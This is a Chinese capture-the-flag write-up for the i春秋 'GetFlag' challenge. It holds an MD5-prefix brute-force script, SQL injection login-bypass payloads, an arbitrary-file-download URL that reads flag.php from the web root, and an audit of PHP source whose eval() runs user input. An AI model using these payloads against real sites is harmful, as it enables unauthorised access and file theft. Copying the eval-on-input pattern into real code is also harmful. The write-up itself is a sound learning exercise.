i春秋-GetFlag

题目



考点

sql注入,md5加密,代码审计,利用eval函数

解题

参考wp

复制代码
https://www.cnblogs.com/qiaowukong/p/13630130.html

找md5值

看见验证码中的提示,就是去找一个md5值前六位是指定值的数(严格来说不一定是数),白嫖大佬的脚本

复制代码
# -*- coding: UTF-8 -*-
'''
@File    :GetFlag.py
@IDE     :PyCharm 
@Author  :M7
@Date    :2024/3/21
'''
import hashlib
from multiprocessing.dummy import Pool as ThreadPool

# MD5截断数值已知 求原始数据
# 例子 substr(md5(captcha), 0, 6)=60b7ef

def md5(s):  # 计算MD5字符串
    return hashlib.md5(str(s).encode('utf-8')).hexdigest()


keymd5 = 'cd0bf6'   #已知的md5截断值
md5start = 0   # 设置题目已知的截断位置
md5length = 6

def findmd5(sss):    # 输入范围 里面会进行md5测试
    key = sss.split(':')
    start = int(key[0])   # 开始位置
    end = int(key[1])    # 结束位置
    result = 0
    for i in range(start, end):
        # print(md5(i)[md5start:md5length])
        if md5(i)[0:6] == keymd5:            # 拿到加密字符串
            result = i
            print(result)    # 打印
            break


list=[]  # 参数列表
for i in range(10):   # 多线程的数字列表 开始与结尾
    list.append(str(10000000*i) + ':' + str(10000000*(i+1)))
pool = ThreadPool()    # 多线程任务
pool.map(findmd5, list) # 函数 与参数列表
pool.close()
pool.join()

得到:

复制代码
11481707
26143897
75290163

测试sql注入

复制代码
admin' or 1=1--+
123
11481707

返回的界面有显示报错,那么就说明存在sql注入

接下来就是测试sql注入语句了

构造注入payload

复制代码
admin' or '1'='1



访问可疑文件

点击三个文件都能下载下来,但是只有一个a.php文件有利用信息,得到flag在网站的根目录下

那么利用前面下载代码的功能,把flag.php文件下载下来

下载文件

构造下载文件payload

复制代码
http://eci-2ze7er1y0cj85awr3unk.cloudeci1.ichunqiu.com/Challenges/file/download.php?f=/var/www/html/Challenges/flag.php

下载下来后,看到源码如下:

复制代码
<?php
$f = $_POST['flag'];
$f = str_replace(array('`', '$', '*', '#', ':', '\\', '"', "'", '(', ')', '.', '>'), '', $f);
if((strlen($f) > 13) || (false !== stripos($f, 'return')))
{
		die('wowwwwwwwwwwwwwwwwwwwwwwwww');
}
try
{
		 eval("\$spaceone = $f");
}
catch (Exception $e)
{
		return false;
}
if ($spaceone === 'flag'){
	echo file_get_contents("helloctf.php");
}

?>

代码审计

16行的if判断为true时才会显示helloctf.php文件代码

变量$spaceone得在第10行得到运行

那么就得从第二行有一个post传参的功能入手了

第三行和第四行还对post传入的字符串进行了过滤

最终构造的payload为

复制代码
post传参

flag='flag';

改包发起请求

看到返回没有任何东西,那么在查看一下源代码,发现了有flag

提交flag

相关推荐
2501_916007479 小时前
局域协作中的前端调试:WebDebugX 在本地多端调试中的实践
websocket·网络协议·tcp/ip·http·网络安全·https·udp
2501_9159184110 小时前
如何构建一个高效的 iOS 应用日志体系?从开发调试到使用KeyMob上线排查的实践经验
websocket·网络协议·tcp/ip·http·网络安全·https·udp
qq_2430507918 小时前
Siege:开源的 HTTP/FTP 压力测试与基准评估工具!全参数详细教程!Kali Linux教程!
linux·网络·web安全·网络安全·黑客·压力测试·kali linux
安全系统学习1 天前
网络安全之Web渗透加解密
网络·安全·web安全·网络安全·系统安全
枷锁—sha1 天前
WireShark网络抓包—详细教程
网络·测试工具·web安全·网络安全·wireshark
枷锁—sha1 天前
【HW系列】—web常规漏洞(CSRF与SSRF)
服务器·前端·网络·笔记·安全·网络安全·csrf
禾木KG2 天前
网络安全-等级保护(等保) 3-2 GB/T 28449-2019《信息安全技术 网络安全等级保护测评过程指南》-2018-12-28发布【现行】
网络安全
vortex52 天前
通配符滥用详解:Linux命令行的潜在风险
linux·运维·安全·网络安全·渗透测试
安全系统学习2 天前
Web安全渗透之长城杯夺旗赛
运维·计算机网络·安全·web安全·网络安全
枷锁—sha2 天前
【HW系列】—web组件漏洞(Strtus2和Apache Log4j2)
前端·安全·web安全·网络安全·log4j·apache